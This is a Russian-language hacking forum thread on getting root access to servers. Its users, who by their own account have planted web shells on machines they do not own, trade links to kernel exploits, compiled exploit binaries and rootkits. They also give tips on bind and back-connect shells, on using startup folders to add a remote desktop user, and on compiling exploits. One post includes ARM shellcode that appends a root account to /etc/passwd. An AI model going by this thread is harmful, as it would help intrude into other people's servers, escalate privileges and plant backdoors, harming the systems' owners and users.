Повышение прав [задай вопрос - получи ответ]

специальная тема для вопросов, связанных с повышением прав, рутинг, компиляция сплоитов, помощь в поиске сплоитов и т.п.

сплоиты ищем тут (http://exploit-db.com) и тут (http://www.1337day.com/)

небольшой FAQ от Dimi4-a тут (https://antichat.live/threads/151993/)

оффтоп, флейм и вопросы типа "залил шелл как порутить сервак" будут удалятся.

--------------

--------------

Дорогие Форумчани, хакеры, хаЦкеры и домохозяйки!

прежде чем запостить какой то шаблон-пост типа

"чо есть для этого 2.6.6666666 2010",не ленитесь, смотрите топик, очень вероятно что такой вопрос уже задавали и не один раз, используйте базы сайтов для поиска сплоитов, см. выше в этом посте,

за такой тупой флуд будет бан, и испорчена репа

И еще тут:

http://www.vul.kr/category/vulnerable-information/exploit-vulnerable-information

http://exploit.in/forum/index.php?showtopic=37481&hl=%FD%EA%F1%EF%EB%EE%E8%F2%FB

http://packetstormsecurity.org/assess/exploits/

http://www.astalavista.com/index.php?app=exploits

Есть чьо под это?

Linux 2.6.26-1-amd64 #1 SMP Sat Jan 10 19:55:48 UTC 2009 x86_64

Попробуй это

http://risesecurity.org/exploits/linux-sendpage.c

http://linux.derkeiler.com/Mailing-Lists/Debian/2008-02/msg01109.html

http://www.securityfocus.com/bid/36901/exploit

http://www.securityfocus.com/bid/34405/exploit

Если не те

Поищи здесь сам

http://www.securityfocus.com/

Вот еще допишу

http://www.hackforums.net/showthread.php?tid=353856

http://www.exploit-db.com/

http://bugs.gentoo.org


Code:
http://www.hackforums.net/search.php?action=results&sid=a68653d10d3f78c8d02aea5834bfd26b&sortby=lastpost&order=desc

Можно посмотреть здесь: http://th3-0utl4ws.com/localroot/

Linux 2.6.18-194.el5

ссылочка на сплоит

http://seclists.org/fulldisclosure/2010/Sep/268

---------------------------

[B]Linux Kernel

Может у кого есть сплоит

Linux kernel 2.6.32.21

Вот собрал в кучу эксплоиты,может кому че пригодится.

ТУТ (http://lin-web-us.cybertek.co.za/sites/arhive/exsploite/exsploit.zip)

А здесь Rootkitы

Тут (http://lin-web-us.cybertek.co.za/sites/arhive/rootkit/Rootkit.zip)

Дайте под такую телегу сплойт плиз. Желательно скомпиленый. Бо gcc нету.


Linux node4 2.100.3-1-amd64 #1 SMP Mon Aug 17 19:29:29 CEST 2009 x86_64 GNU/Linux

Вот этот попробуй:

http://www.exploit-db.com/exploits/12715/

А здесь видео как шелл закинуть.

http://www.pacenoge.org/vid/e107.html

Может кто подскажет сплоит под :

Linux ptzhost.com 2.6.26-bpo.1-amd64 #1 SMP Thu Mar 26 23:14:12 UTC 2009 x86_64

и

FreeBSD thor.from.sh 7.3-STABLE FreeBSD 7.3-STABLE #0: Thu Sep 30 15:30:33 MSD 2010 root@thor.from.sh:/usr/obj/usr/s

stepashka_ said:
Может кто подскажет сплоит под :
Linux ptzhost.com 2.6.26-bpo.1-amd64 #1 SMP Thu Mar 26 23:14:12 UTC 2009 x86_64


http://www.risesecurity.org/exploits/linux-sendpage.c

Linux version 2.6.18-194.11.4.el5

Есть что-нибудь?

TARANTYL said:
Linux version 2.6.18-194.11.4.el5
Есть что-нибудь?


uname -a

скинь

DCrypt said:
uname -a
скинь


Скидывает на


Code:
$ ls -lha
total 44K
drwxrwx--- 3 apache webapps 4.0K Nov 2 15:23 .
drwxr-xr-x 11 webapps webapps 4.0K Dec 16 2009 ..
drwxr-x--x 4 apache apache 4.0K Aug 23 00:16 _cached_templates

Тогда залей туда wso2 шелл и сверху будет унейм написан.

Хотел порутать серв , но не тут то было ((

После бинда порта и попытке подконектится к нему через "nc site port" ничего не происходит , пробывал разные порты , но так ничего и не получилось . В чем проблема и возможно это как-то обойти ?

nc -l -p 4444

может там фаервол стоит?

DCrypt said:
nc -l -p 4444
может там фаервол стоит?


был бы фаер не биндился бы порт)

SEWERN said:
Хотел порутать серв , но не тут то было ((
После бинда порта и попытке подконектится к нему через "nc site port" ничего не происходит , пробывал разные порты , но так ничего и не получилось . В чем проблема и возможно это как-то обойти ?


делай бэк-коннект. как? ответ тут (https://antichat.live/threads/151993/) или тут (https://antichat.live/showthread.php/p/137403/)

SEWERN said:
был бы фаер не биндился бы порт)


Тогда открывай у себя порт и перенаправляй.

DCrypt said:
Тогда залей туда wso2 шелл и сверху будет унейм написан.


Linux 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64

TARANTYL said:
Linux 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64


По крайней мере в паблике нет сплойта.

Вот такие еще появились:

Linux 2.6.18-92.1.22.el5PAE #1 SMP Tue Dec 16 12:36:25 EST 2008 i686

Linux 2.6.18-92.el5PAE #1 SMP Tue Jun 10 19:22:41 EDT 2008 i686

TARANTYL said:
Вот такие еще появились:
Linux 2.6.18-92.1.22.el5PAE #1 SMP Tue Dec 16 12:36:25 EST 2008 i686
Linux 2.6.18-92.el5PAE #1 SMP Tue Jun 10 19:22:41 EDT 2008 i686


https://rdot.org/forum/showthread.php?p=1096

DCrypt said:
http://www.risesecurity.org/exploits/linux-sendpage.c


Это не прокатит.

У меня уже второй раз пишет upgrate 2008 но ни один сплоит 2009-2010 не катит

Попробуйте.

http://www.sambir.org/img/uploads/storm.php

если руткит поставите вличку отпишите плиз.

Я как-бы никогда не работал со сплоитами и так далее. Скажите через консоль WSO шелла возможно применять сплоиты и так далее? Всегда ломал только CMS'ки где не применял сплоиты и всеразличные модные штучки для взлома.

TARANTYL said:
Я как-бы никогда не работал со сплоитами и так далее. Скажите через консоль WSO шелла возможно применять сплоиты и так далее? Всегда ломал только CMS'ки где не применял сплоиты и всеразличные модные штучки для взлома.


Я что-то ничего не понял. Скажи сразу цель.

DCrypt said:
Я что-то ничего не понял. Скажи сразу цель.


Извиняюсь. Я имел в виду что не имел опыта обращения со сплоитами для "root"ания серверов.

Так вот: залив Web'shell WSO в котором есть консоль, я могу применять сплоиты для того что бы порутать сервер?

UPD: Всё понял. Дурдом написал. Через php это не сделать.

TARANTYL said:
Так вот: залив Web'shell WSO в котором есть консоль, я могу применять сплоиты для того что бы порутать сервер?


Можно. Был бы сплойт под версию ядра (kernel).

TARANTYL said:
Извиняюсь. Я имел в виду что не имел опыта обращения со сплоитами для "root"ания серверов.
Так вот: залив Web'shell WSO в котором есть консоль, я могу применять сплоиты для того что бы порутать сервер?
UPD: Всё понял. Дурдом написал. Через php это не сделать.


backonnect или bind

Есть фтп локал под версию 5.x:

http://www.scribd.com/doc/3123768/FTP-Exploits-By-Ankit-Fadia

Еще есть http://www.auscert.org.au/render.html?it=1851

Кстати, кажись в метасплоите под эту ветку что-то было...точно не помню...

daniel_1024 said:
под SunOS localhost 5.8 Generic_108528-17 есть что-нибудь ?


Может здесь че подойдет

http://www.insecure.org/sploits/xaw.overflows.html

http://seclists.org/bugtraq/1997/May/107

http://www.security-teams.net/board/index.php?showtopic=5570

Linux 2.6.18-194.17.4.el5PAE #1 SMP Mon Oct 25 16:35:27 EDT 2010 i686 i686 i386 GNU/Linux

есть что-то ?

SEWERN said:
Linux 2.6.18-194.17.4.el5PAE #1 SMP Mon Oct 25 16:35:27 EDT 2010 i686 i686 i386 GNU/Linux
есть что-то ?


в паблике кажись нету, 100 раз смотрел

Konqi said:
в паблике кажись нету, 100 раз смотрел


жаль ((

Если будет возможность - маякни плз если найдешь

SEWERN said:
Linux 2.6.18-194.17.4.el5PAE #1 SMP Mon Oct 25 16:35:27 EDT 2010 i686 i686 i386 GNU/Linux
есть что-то ?


ссылка на сплоит, но там регаться надо

http://turksec.info/tg-f5/2-6-18-164-194-localroot-exploit-t691.html

а это сплоит попробуй

http://depositfiles.com/files/l4mzjx236

Linux antila 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010

x86_64

есть чо нить под это ядро?

pinch said:
Linux antila 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010
x86_64
есть чо нить под это ядро?


Попробуй этот

https://rdot.org/forum/archive/index.php/t-714.html

вот этот вроде новей

http://ashiyane.org/forums/showthread.php?p=154244

Есть шелл,нужен сплоит (первый раз встречаю Macintosh HD)

Server.local 9.8.0 Darwin Kernel Version 9.8.0: Wed Jul 15 16:55:01 PDT

2009; root:xnu-1228.15.4~1/RELEASE_I386 i386

Linux vps1.pdm.su 2.6.26-2-openvz-amd64 #1 SMP Sun Jun 20 20:28:43 UTC 2010 x86_64

ubi said:
Linux vps1.pdm.su 2.6.26-2-openvz-amd64 #1 SMP Sun Jun 20 20:28:43 UTC 2010 x86_64


https://rdot.org/forum/archive/index.php/t-714.html

http://www.securityfocus.com/bid/36901/exploit

Не могу нормально скомпилить. Даже на своей машине.


snip:~# gcc -o exp exp.c
exp.c: In function 'main':
exp.c:79: warning: incompatible implicit declaration of built-in function 'strlen'




Code:
#include


char SC[] =
/* Thumb mode */
"\x05\x50\x45\xe0" /* sub r5, r5, r5 */
"\x01\x50\x8f\xe2" /* add r5, pc, #1 */
"\x15\xff\x2f\xe1" /* bx r5 */

/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
"\x78\x46" /* mov r0, pc */
"\x7C\x30" /* adds r0, #124 */
"\xff\x21" /* movs r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\x45\x31" /* adds r1, #69 */
"\xdc\x22" /* movs r2, #220 */
"\xc8\x32" /* adds r2, #200 */
"\x05\x27" /* movs r7, #5 */
"\x01\xdf" /* svc 1 */

/* r8 = fd */
"\x80\x46" /* mov r8, r0 */

/* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x79\x46" /* mov r1, pc */
"\x18\x31" /* adds r1, #24 */
"\xc0\x46" /* nop (mov r8, r8) */
"\x48\x22" /* movs r2, #72 */
"\x04\x27" /* movs r7, #4 */
"\x01\xdf" /* svc 1 */

/* close(fd) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x06\x27" /* movs r7, #6 */
"\x01\xdf" /* svc 1 */

/* exit(0) */
"\x1a\x49" /* subs r1, r1, r1 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x01\x27" /* movs r7, #1 */
"\x01\xdf" /* svc 1 */

/* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
"\x73\x68\x65\x6c\x6c\x2d\x73\x74\x6f\x72"
"\x6d\x3a\x24\x31\x24\x4b\x51\x59\x6c\x2f"
"\x79\x72\x75\x24\x50\x4d\x74\x30\x32\x7a"
"\x55\x54\x57\x6d\x4d\x76\x50\x57\x63\x55"
"\x34\x6f\x51\x4c\x73\x2f\x3a\x30\x3a\x30"
"\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f"
"\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73"
"\x68\x0a"

/* /etc/passwd */
"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";


int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}

Попробуй добавить ещё

#include

DCrypt said:
Не могу нормально скомпилить. Даже на своей машине.

Code:
#include


char SC[] =
/* Thumb mode */
"\x05\x50\x45\xe0" /* sub r5, r5, r5 */
"\x01\x50\x8f\xe2" /* add r5, pc, #1 */
"\x15\xff\x2f\xe1" /* bx r5 */

/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
"\x78\x46" /* mov r0, pc */
"\x7C\x30" /* adds r0, #124 */
"\xff\x21" /* movs r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\x45\x31" /* adds r1, #69 */
"\xdc\x22" /* movs r2, #220 */
"\xc8\x32" /* adds r2, #200 */
"\x05\x27" /* movs r7, #5 */
"\x01\xdf" /* svc 1 */

/* r8 = fd */
"\x80\x46" /* mov r8, r0 */

/* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x79\x46" /* mov r1, pc */
"\x18\x31" /* adds r1, #24 */
"\xc0\x46" /* nop (mov r8, r8) */
"\x48\x22" /* movs r2, #72 */
"\x04\x27" /* movs r7, #4 */
"\x01\xdf" /* svc 1 */

/* close(fd) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x06\x27" /* movs r7, #6 */
"\x01\xdf" /* svc 1 */

/* exit(0) */
"\x1a\x49" /* subs r1, r1, r1 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x01\x27" /* movs r7, #1 */
"\x01\xdf" /* svc 1 */

/* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
"\x73\x68\x65\x6c\x6c\x2d\x73\x74\x6f\x72"
"\x6d\x3a\x24\x31\x24\x4b\x51\x59\x6c\x2f"
"\x79\x72\x75\x24\x50\x4d\x74\x30\x32\x7a"
"\x55\x54\x57\x6d\x4d\x76\x50\x57\x63\x55"
"\x34\x6f\x51\x4c\x73\x2f\x3a\x30\x3a\x30"
"\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f"
"\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73"
"\x68\x0a"

/* /etc/passwd */
"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";


int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}



У меня без проблем (2.6.17-gentoo-r8)

попробуй так:

gcc -o file file.c -lpthread

скомпилил

http://depositfiles.com/files/2sebpiiyg

Залил шелл на Win-сервер. К несчастью, там IIS, поэтому права обрезаны по самые уши. Есть Remote Deskop там, но паролей я не знаю. Могу создавать файлы в некоторых папках, например, C:\Documents and Settings\All Users\. Думаю, залить трой или еще что-нибудь, вдруг админ или пользователь запустит его Что есть из пабликового?

Если есть вариант залить в папку с автозагрузкой (по умолчанию C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузк а) батник с созданием пользователя удаленного стола, то так и делай

Так же можешь подредактировать ярлыки программ (вставив запуск своего файла) если нет, то хоть версию iis скажи...

ищу под 2.6.18-194

попугай said:
Залил шелл на Win-сервер. К несчастью, там IIS, поэтому права обрезаны по самые уши. Есть Remote Deskop там, но паролей я не знаю. Могу создавать файлы в некоторых папках, например, C:\Documents and Settings\All Users\. Думаю, залить трой или еще что-нибудь, вдруг админ или пользователь запустит его
Что есть из пабликового?


http://www.exploit-db.com/exploits/15609/

#Wolf# said:
ищу под
2.6.18-194


Попробуй этот

http://depositfiles.com/files/gw7ce1mnu

z0mbyak said:
Если есть вариант залить в папку с автозагрузкой (по умолчанию C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузк а) батник с созданием пользователя удаленного стола, то так и делай


Не плохая идея кстати, только не в C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузк а, а в

C:\Documents and Settings\Admin\Главное меню\Программы\Автозагрузк а, ну или какой там юзер с админ правами, так папка и будет называться (посмотри командой net user). Ну это подойдет только если сервак ребутают вообще.

#Wolf# said:
ищу под
2.6.18-194

valyka80 said:
Попробуй этот
http://depositfiles.com/files/gw7ce1mnu




" if author else f"

#Wolf# said:
ищу под
2.6.18-194

valyka80 said:
Попробуй этот
http://depositfiles.com/files/gw7ce1mnu




Не компилится. Кто-нибудь может поправить?

Перезалил (http://wolf-et.ru/exploit.c).

Сообщение от #Wolf#
ищу под 2.6.18-194
Цитата:
Сообщение от valyka80
Попробуй этот
http://depositfiles.com/files/gw7ce1mnu
Не компилится. Кто-нибудь может поправить?
Перезалил.


Попробуй слоитпак enlightenment там под эту ветку кажись было...

http://grsecurity.net/~spender/enlightenment.tgz

При комплиировании:


Code:
sh-3.2$ gcc -o file 1.c
In file included from 1.c:20:
/usr/include/linux/atm.h:210: error: expected specifier qualifier-list before 'uint32_t'

Uname a :


Code:
Linux 2.6.18-128.7.1.el5 #1 SMP Wed Aug 19 04:00:44 EDT 2009 i686 athlon i386 GNU/Linux

Эксплоит :

http://www.exploit-db.com/exploits/10613/

подскажите в чем проблема.

Code:
$ uname -a
Linux ***.com 2.6.18-028stab070.5 #1 SMP Fri Sep 17 15:37:23 MSD 2010 i686 i686 i386 GNU/Linux

есть что?

GIG

ты напиши подробно какая и в какой строке ошибка

(там может путь не катит)

valyka80 said:
GIG
ты напиши подробно какая и в какой строке ошибка
(там может путь не катит)


а то что я написал выше , это что по твоему?

GIG said:
а то что я написал выше , это что по твоему?


sorry я хотел бы узнать подробнее ошибку

там сто пудов путь исправить надо

Linux server01 2.6.25.9 #1 Thu Jun 26 18:54:56 CEST 2008 i686

Не подскажите сплоит?-)

P.S. из enlightenment не подошли...

z0mbyak said:
Linux server01 2.6.25.9 #1 Thu Jun 26 18:54:56 CEST 2008 i686
Не подскажите сплоит?-)
P.S. из enlightenment не подошли...


http://www.securityfocus.com/bid/36901/exploit

Windows NT PS30 5.2 build 3790 (Windows Server 2003 Web Edition Service Pack 2)

есть ли сплоит под это?

Подскажите, пожалуйста, что-то под

OS version: Linux version 2.6.25-NX.18-styx (root@styx) (gcc version 4.1.1 (Gentoo 4.1.1-r1)) #1 SMP Thu Nov 5 04:17:45 MSK 2009

Code:
$ uname -a
FreeBSD **** 6.3-PRERELEASE FreeBSD 6.3-PRERELEASE #1: Thu Dec 27 17:38:41 MSK 2007 root@***:/usr/src/sys/i386/compile/KOT i386

---

$ uname -a
FreeBSD **** 6.4-RELEASE FreeBSD 6.4-RELEASE #0: Wed Nov 26 12:11:16 UTC 2008 root@***:/usr/obj/usr/src/sys/SMP i386

имеется что-нибудь?

:."]
.:[melkiy]:. said:

Code:
$ uname -a
FreeBSD **** 6.3-PRERELEASE FreeBSD 6.3-PRERELEASE #1: Thu Dec 27 17:38:41 MSK 2007 root@***:/usr/src/sys/i386/compile/KOT i386

---

$ uname -a
FreeBSD **** 6.4-RELEASE FreeBSD 6.4-RELEASE #0: Wed Nov 26 12:11:16 UTC 2008 root@***:/usr/obj/usr/src/sys/SMP i386

имеется что-нибудь?


http://www.frasunek.com/pipe.txt

или

http://www.frasunek.com/devfs.txt

z0mbyak said:
#2.6.18-194
Попробуй слоитпак enlightenment там под эту ветку кажись было...
http://grsecurity.net/~spender/enlightenment.tgz


не пошло

Linux 2.6.18-164.11.1.el5.centos.plusPAE #1 SMP Wed Jan 20 19:33:21 EST 2010 i686

Блин, очень надо

Привет, есть такой сервер:

$ uname -a

FreeBSD 4.10-RELEASE FreeBSD 4.10-RELEASE #0: Mon Apr 2005

Но, на нем хоть и есть gcc, при любом обращении выдает "The: not found". Есть также сс, но для него нету либ, то есть несколько сплоитов, которые я нашел в инете, не компилятся, жалуясь на отсутствие stdio.h и прочего. Пробовал скомпилить на другом компе, но в одном случае ругнулось варнингами и не сработало на жертве, в другом вообще не скомпилилось (vvfreebsd.c). Что можно сделать?

Кстати, поиск по stdio.h ничего не дал, так что их либо нету, либо не видно моему юзеру.

Вот скомпилил на freebcd --vvfreebsd.c--

http://depositfiles.com/files/tdbriwq3s

Спасиб.

Спасиб.

padlina2

http://www.sendspace.com/file/8kbnte

Есть что-то 2.6.18-028stab067.4-PAE #1 SMP Thu Jan 14 22:09:19 MSK 2010 i686 i686 i386 GNU/Linux ?

SEWERN said:
Есть что-то 2.6.18-028stab067.4-PAE #1 SMP Thu Jan 14 22:09:19 MSK 2010 i686 i686 i386 GNU/Linux ?


http://www.feelcomz.com/?p=article&c=12

может здесь че найдешь

valyka80 said:
http://www.feelcomz.com/?p=article&c=12
может здесь че найдешь


смотрел - нету(

SEWERN said:
смотрел - нету(


У меня есть вот эти но они старенькие попробуй:

http://depositfiles.com/files/0k2l24y1n

что-нибудь есть под это Windows NT 5.2 build 3790

Не могу сплоит поставить пишет ошибку

/bin/sh floaning point exception./exploit

что это может быть

Приветствую, помогите найти exploit под FreeBSD 6.2-RELEASE #0: Fri Jan 12 11:05:30 UTC 2007, вроде старая, а найти не могу:-(

z0mbyak said:
Приветствую, помогите найти exploit под FreeBSD 6.2-RELEASE #0: Fri Jan 12 11:05:30 UTC 2007, вроде старая, а найти не могу:-(


padlina не катит?

feebsd 7.01 катит

padlina не катит?
feebsd 7.01 катит


Жаль, но не катит:-(

z0mbyak said:
Жаль, но не катит:-(


попробуй мой архивчик (админы простите)\

http://depositfiles.com/files/192h2mbdr

попробуй мой архивчик (админы простите)\
http://depositfiles.com/files/192h2mbdr


Облом :-( ни один не подошел:-(

z0mbyak said:
Облом :-( ни один не подошел:-(


ну извени(

Linux infong 2.4 #1 SMP Wed Nov 4 21:12:12 UTC 2009 i686 GNU/Linux

Для такого есть эксп?

Linux 2.6.18-194.17.1.el5PAE #1 SMP Wed Sep 29 13:31:51 EDT 2010 i686 может есть что?)

Вот, http://1337db.com/exploits/15065 и вотhttp://1337db.com/exploits/14333 , сам правда не проверял, заодно отпиши

обе не пашут....(( чтож будем искать дальше...

Linux infong 2.4 #1 SMP Tue Dec 18 22:34:10 UTC 2007 i686 GNU/Linux Под такое найдется?

uname -a

Linux infong645 2.6.28.8-20100920-iscsi-ntacker-fasync-mremap-amd-sec5-grsec #1 SMP Mon Sep 20 15:46:40 CEST 2010 i686 GNU/Linux

нет и второй тоже НЕТ.

Есть у кого нибуд. Спасибо.

2.6.27.10-grsec-xxxx-grs-ipv4-64 #2 SMP Fri Jan 30 09:56:38 UTC

2009 x86_64

Закинул шелл в папку images захожу и не вижу ни одного файла,хотя там с десяток должно быть,права конечно все обрезанны, но видеть то я должен.

valyka80 said:
Закинул шелл в папку
images
захожу и не вижу ни одного файла,хотя там с десяток должно быть,права конечно все обрезанны, но видеть то я должен.


не факт, в disabled_functions смотри какие функции запрещены

не раз такое было, сначало грузи мини шелл, пойми что там творится

попробуй scandir()

вот что я мог узнать

Safe-Mode: ON (secure)

Disabled PHP Functions: NONE

а почему, если я закинул его через админку значит права на запись стоят (а может я его закинул и он прочухал и сразу все по закрывал ,потому что второй раз закинуть я не смог, но и этот шелл он не удалил,хотя шелл ххх.php)

$n@ke said:
попробуй scandir()


scandir()

нет прав

Есть ли что нибудь на:

Software: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g. PHP/5.2.6-1+lenny9

uname -a: Linux 2.6.26-2-amd64 #1 SMP Thu Sep 16 15:56:38 UTC 2010 x86_64

Avalon. said:
Есть ли что нибудь на:
Software: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g. PHP/5.2.6-1+lenny9
uname -a: Linux 2.6.26-2-amd64 #1 SMP Thu Sep 16 15:56:38 UTC 2010 x86_64


Попробуй этот

http://seclists.org/fulldisclosure/2010/Dec/85

а здесь почитай как дырку патчем открыть

http://www.linux.org.ru/forum/talks/5339764

залил сплоит, скомпилил, запустил - в ответ получаю:

Resolving kernel addresses...

[+] Resolved econet_ioctl to 0xffffffffa022719b

[+] Resolved econet_ops to 0xffffffffa02281c0

Failed to resolve kernel symbols. - это значит что уязвимость прикрыта?

Есть ли какие нить др варианты?

Avalon. said:
залил сплоит, скомпилил, запустил - в ответ получаю:
Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xffffffffa022719b
[+] Resolved econet_ops to 0xffffffffa02281c0
Failed to resolve kernel symbols.
- это значит что уязвимость прикрыта?
Есть ли какие нить др варианты?


может этот

http://sota.gen.nz/compat2/robert_you_suck.c

я как раз этот эксплоит и пробовал.

Avalon. said:
залил сплоит, скомпилил, запустил - в ответ получаю:
Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xffffffffa022719b
[+] Resolved econet_ops to 0xffffffffa02281c0
Failed to resolve kernel symbols.
- это значит что уязвимость прикрыта?
Есть ли какие нить др варианты?


а вот цитата с http://www.linux.org.ru/forum/talks/5656646

Resolving kernel addresses...

[+] Resolved econet_ioctl to 0xffffffffa035119b

[+] Resolved econet_ops to 0xffffffffa03521c0

Failed to resolve kernel symbols.

Опубликованный код эксплойта оформлен в виде прототипа, намеренно модифицированного для защиты от необдуманного использования неискушенными обывателями

какбэ намекает, что тебе, как кернел девелоперу, сначала нужно его немного подправить.

Потому что люди пишущие сплоиты тестят на своих системах.

Avalon. said:
я как раз этот эксплоит и пробовал.


это два разных сплоита

http://seclists.org/fulldisclosure/2010/Dec/85 --full-nelson.c

http://sota.gen.nz/compat2/robert_you_suck.c --robert_you_suck.c

ок, спс будим искать... ну если подскажете где править, то тоже выражу свою признательность

И этот тоже использовал, и там и там выходит ошибка

Failed to resolve kernel symbols

а именно когда идет обработка строки commit_creds = (_commit_creds) get_kernel_sym("commit_creds");

Может есть какие нить советы исходя из этой ситуации?

в общем, сплоит не пашет изза отсутствия директории /proc/ksyms

, которая фигурирует в сплоите, так что ........

Avalon. said:
в общем, сплоит не пашет изза отсутствия директории /proc/ksyms
, которая фигурирует в сплоите, так что ........


А если есть права то можно поставить эту библиотеку,вот

кое какая инфа по kallsyms и /proc/ksyms:

http://www.mail-archive.com/linux-usb-devel@lists.sourceforge.net/msg22883.html

http://lkml.indiana.edu/hypermail/linux/kernel/0806.2/1585.html

http://fixunix.com/kernel/395176-proc-kallsyms-broken-2-6-26-rc1-git6.html

http://www.kernel.org/doc/man-pages/online/pages/man5/proc.5.html

кому интересно нашел архив эксплоитов и не только.

http://grsecurity.net/~spender/

valyka80 said:
А если есть права то можно поставить эту библиотеку,вот
кое какая инфа по kallsyms и /proc/ksyms:
http://www.mail-archive.com/linux-usb-devel@lists.sourceforge.net/msg22883.html
http://lkml.indiana.edu/hypermail/linux/kernel/0806.2/1585.html
http://fixunix.com/kernel/395176-proc-kallsyms-broken-2-6-26-rc1-git6.html
http://www.kernel.org/doc/man-pages/online/pages/man5/proc.5.html


чтото не получиось создать эту директорию.....ну лано покопаем еще. За помощь спасибо.

Avalon. said:
чтото не получиось создать эту директорию.....ну лано покопаем еще. За помощь спасибо.


ты директорию не создашь у тебя прав не хватит,тут поищи инфу

http://www.google.ru/search?client=opera&rls=ru&q=ksyms.c&sourceid=opera&ie=utf-8&oe=utf-8&channel=suggest

Linux 2.6.26-2-amd64 #1 SMP Thu Sep 16 15:56:38 UTC 2010 x86_64 GNU/Linux

Debian

Подкиньте кто что может (можно в ПМ)

ЗЫ:Все что есть в паблике попробовал,ни чего не взяло (

Поставил руткит,через patty не заходит на хост.

Через bind-connect захожу под правами рута

но не могу поменять права в др.директориях

пишет типа в файле конфигурации sh исправляйте

а туда нет прав,че за ерунда может

кто подскажет.

valyka80 said:
Поставил руткит,через patty не заходит на хост.
Через bind-connect захожу под правами рута
но не могу поменять права в др.директориях
пишет типа в файле конфигурации
sh
исправляйте
а туда нет прав,че за ерунда может
кто подскажет.


что хочешь поменять, скажи конкретно

Konqi said:
что хочешь поменять, скажи конкретно


1-хотел входить через patty(не могу почему?)

2-в папку var,home да в любые я же вродь под рутом

valyka80 said:
1-хотел входить через patty(не могу почему?)
2-в папку
var,home
да в любые я же вродь под рутом


мб имя пользователя рут, но на самом деле это не рут, смотри id

больше ниче сказать немогу, так как других вариантов кажется нету..а еще попробуй открыть /etc/shadow

ls -al /etc | grep shadow

смотри права на shadow, и попробуй открыть. если права 700, И открыло, знач рут.

upd: покажи плз ответ команды id

еще скинь листинги ls -al /home, ls -al /root

Konqi said:
мб имя пользователя рут, но на самом деле это не рут, смотри id
больше ниче сказать немогу, так как других вариантов кажется нету..а еще попробуй открыть /etc/shadow
ls -al /etc | grep shadow
смотри права на shadow, и попробуй открыть. если права 700, И открыло, знач рут.


shadow,passwd и т.д кроме sh.conf

все открывает а права не меняет.Че за ерунда

И руткит поставился нормально порт 37998

а соединять не хочет.(я имею ввиду через patty)

ID

uid=0(root) gid=0(root) groups=48(apache),2523(psaserv),10030(backuppc)

ls -al /home

total 24

drwxr-xr-x 4 root root 4096 May 10 2010 .

drwxrwxrwx 27 root root 4096 Jan 11 22:41 ..

drwx------ 2 backuppc backuppc 4096 May 10 2010 backuppc

drwxr-xr-x 2 root root 4096 Jul 21 2008 ftp

ls -al /root

http://jpg1.ru//2011/1/11/_jpg1.ru_205255119.JPG

есть что-то 2.6.32.2-xxxx-std-ipv4-32 #1 SMP Tue Dec 29 14:40:32 UTC 2009 i686 ?

SEWERN said:
есть что-то 2.6.32.2-xxxx-std-ipv4-32 #1 SMP Tue Dec 29 14:40:32 UTC 2009 i686 ?


Попробуй эти.

http://depositfiles.com/files/d00fjeq4k

Подскажите рутается такой сервак и чем:

Linux 2.6.18-194.26.1.el5 #1 SMP Fri Oct 29 14:21:22 EDT 2010 i686

Linux 2.6.18-194.26.1.el5xen #1 SMP Fri Oct 29 14:36:51 EDT 2010 i686

Пробовал vmsplice - не помог.

Держи в нете приват нашел,попробуй (у меня прокатило 2010г. апрель)

http://depositfiles.com/files/zg54idprg

valyka80 said:
Держи в нете приват нашел,попробуй (у меня прокатило 2010г. апрель)
http://depositfiles.com/files/zg54idprg


а может кто скомплитить ? у меня эроры летят при gcc ((

и желательно если у кого есть то дайте рабочий бекдор.c

SEWERN said:
а может кто скомплитить ? у меня эроры летят при gcc ((
и желательно если у кого есть то дайте рабочий бекдор.c


Вот с компиленный

http://depositfiles.com/files/ji31kmw1e

valyka80 said:
Вот с компиленный
http://depositfiles.com/files/ji31kmw1e


спс , попробую)

